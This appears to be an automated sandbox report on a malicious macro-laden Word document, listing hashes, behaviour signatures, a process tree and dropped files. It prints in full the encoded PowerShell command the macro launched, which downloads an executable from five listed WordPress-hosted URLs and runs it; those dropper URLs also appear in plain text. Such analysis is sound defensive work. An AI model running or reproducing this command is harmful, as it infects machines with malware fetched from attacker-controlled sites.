Overview

overview

10

Static

static

1

69257750ed...18.doc

windows7-x64

10

69257750ed...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 00:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    69257750edab7e9df8d5f16986255ad2_JaffaCakes118.doc

  • Size

    143KB

  • MD5

    69257750edab7e9df8d5f16986255ad2

  • SHA1

    412e4e014be73806dbb1b991a17fcf212d0c8cf5

  • SHA256

    f61a7749ba4a209db07cd10c799a6563aac71bcdc4535f1d6777cc685b6e1d6d

  • SHA512

    f3d4e23f3877f9a718715721552846459f04ef3d8c8cf674e08ecc6e7899b5c5d4a8be33c4509517b561369b475b187e4d4ecfeb7ec5677943ce739b35568df6

  • SSDEEP

    3072:u77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qcDYQc1/1+a1KKDJbwT/JASiTSvc:u77HUUUUUUUUUUUUUUUUUUUT52VFYQcL

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://sastodharan.com/wp-admin/IWYPXKtgEa/
exe.dropper

https://www.nesagaviria.com/cloud/wp8k5p_xoqog-4543006057/
exe.dropper

http://healthshiny.com/wp-admin/ecCESGKTbF/
exe.dropper

http://www.averefiducia.com/wp-content/plugins/si-captcha-for-wordpress/gckzzkAsO/
exe.dropper

https://joymakers.joyventures.com/wp-content/uBhQpaMuh/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\69257750edab7e9df8d5f16986255ad2_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -e JABDADcARgBCAFQAMwBwAD0AJwBuAEwAdwBMAHcASQBrACcAOwAkAFAAegBfAGoAdwBRACAAPQAgACcAMgAwADAAJwA7ACQAUwB2AFIAagBTADQAYgBUAD0AJwBOAEQAMAB6AEoAagAnADsAJABVAGkANgBjAEEASgBHAFYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFAAegBfAGoAdwBRACsAJwAuAGUAeABlACcAOwAkAFQATABDAHcAZgBwAFcASgA9ACcAYgBvAFoAWAB3AGoATgB2ACcAOwAkAFYASwAxAFgAQgBhAGsAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAYABDAEwAYABJAEUAbgB0ADsAJABxAHcAYgBtAG4AVwBkAD0AJwBoAHQAdABwADoALwAvAHMAYQBzAHQAbwBkAGgAYQByAGEAbgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ASQBXAFkAUABYAEsAdABnAEUAYQAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBlAHMAYQBnAGEAdgBpAHIAaQBhAC4AYwBvAG0ALwBjAGwAbwB1AGQALwB3AHAAOABrADUAcABfAHgAbwBxAG8AZwAtADQANQA0ADMAMAAwADYAMAA1ADcALwBAAGgAdAB0AHAAOgAvAC8AaABlAGEAbAB0AGgAcwBoAGkAbgB5AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBlAGMAQwBFAFMARwBLAFQAYgBGAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AYQB2AGUAcgBlAGYAaQBkAHUAYwBpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwAGwAdQBnAGkAbgBzAC8AcwBpAC0AYwBhAHAAdABjAGgAYQAtAGYAbwByAC0AdwBvAHIAZABwAHIAZQBzAHMALwBnAGMAawB6AHoAawBBAHMATwAvAEAAaAB0AHQAcABzADoALwAvAGoAbwB5AG0AYQBrAGUAcgBzAC4AagBvAHkAdgBlAG4AdAB1AHIAZQBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBCAGgAUQBwAGEATQB1AGgALwAnAC4AUwBwAEwASQB0ACgAJwBAACcAKQA7ACQAcABJADQAaQB6AFYAUAA9ACcAegBCAE4ATAAxAHoAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEkAMQB6AFAAWQBwAG0AIABpAG4AIAAkAHEAdwBiAG0AbgBXAGQAKQB7AHQAcgB5AHsAJABWAEsAMQBYAEIAYQBrAC4ARABPAHcATgBsAG8AQQBkAGYAaQBMAGUAKAAkAEkAMQB6AFAAWQBwAG0ALAAgACQAVQBpADYAYwBBAEoARwBWACkAOwAkAGMAUABuAEoASQBLAGoAegA9ACcAdABSAGMAbQBZAHoAaAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAVQBpADYAYwBBAEoARwBWACkALgBsAGUAbgBHAFQASAAgAC0AZwBlACAAMgA0ADYAMQA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAQQByAFQAKAAkAFUAaQA2AGMAQQBKAEcAVgApADsAJABBAEsAYQBwADgAdgAxAD0AJwBkAGkAOQB6AHAAZgBKACcAOwBiAHIAZQBhAGsAOwAkAHcAVAB3AGoAagBXAGEAdgA9ACcAVgBvADUAbABoAE4AaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhAEwAWgB1AGMAdQA9ACcAUQBvADgANABvAFIAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2532

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3591D552.wmf
      Filesize

      700B

      MD5

      a79e8b6582c2c90243b876fb651bc70c

      SHA1

      7d7ee152ba0c11768bccd915106cbba4c498a6a4

      SHA256

      30c9c92900c7bdfe6da111bbb56e3853ba18e082dd30287d6909fed8f998da92

      SHA512

      8881518f2d555c2712eb62dc8fb1ca4e07d4acc465b85e8c61836b810d96daadeb2eef04f6351b10992e2fa5d094465c0dfb2ea2b1fe80cbb93578149d8fb783

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C8CE0A6.wmf
      Filesize

      700B

      MD5

      7689b9d59a2a7355d24978fa2a1a77de

      SHA1

      7ffec99ab8b17e0c9ee59910d22d61e7a4113e9c

      SHA256

      c9c95f6e943ae2eb618de2f2ee78a67d5b3cf6de46632b289f9b9c077d579362

      SHA512

      35c4795e00e39fcebf7f131471ba759e633b00760c9ca5cce5c023cf10f265f63c694f15851609f4624df2d3b47e15d87c436f50a2ff8d9d3e7119dbd20bbfe4

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8255BA4.wmf
      Filesize

      700B

      MD5

      f5e747238b3a21b86ef175af76db1bd0

      SHA1

      e6399c700b647e3cd76df4e58c3cd60b06f8c39f

      SHA256

      44f87269f055eaab9374e9888c1a6751cbed1fef6f95d4e5eebbdcf7495d4573

      SHA512

      ac6d7ba4240917217bf2255dd1b0a90a7288f3f64af84747b29faca5f4935d5eaff2f5fe1e5b31feb0cd7e76f408710fb128066b012e351ddbaafa1565b7548b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      f3d482f31c7499e5ac2db8b4eca2a275

      SHA1

      78f7f2cfe984eef6a11c2ef7570f6b2b9c891f6f

      SHA256

      c5bceb17006136736f797f66ddb3a69327d385e443789b541ecb2e516387d0f1

      SHA512

      c05990ac03d340292973224150f8a8107c32f4ffae6e7ef3fbb09a1c43377ca771b42107ae2c14b66e7a9683fdac7fff9e13694145b0267607fa7fda0e49a054

      Download Submit

    • memory/2532-63-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2532-62-0x000000001B7B0000-0x000000001BA92000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2932-40-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-27-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-49-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-56-0x0000000006390000-0x0000000006490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-55-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-41-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-39-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-32-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-31-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-30-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-28-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-0-0x000000002F371000-0x000000002F372000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2932-26-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-29-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-7-0x00000000066A0000-0x00000000067A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-2-0x00000000710ED000-0x00000000710F8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2932-74-0x00000000710ED000-0x00000000710F8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2932-75-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-76-0x0000000006390000-0x0000000006490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2932-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2932-92-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2932-105-0x00000000710ED000-0x00000000710F8000-memory.dmp

      Filesize

      44KB

      Download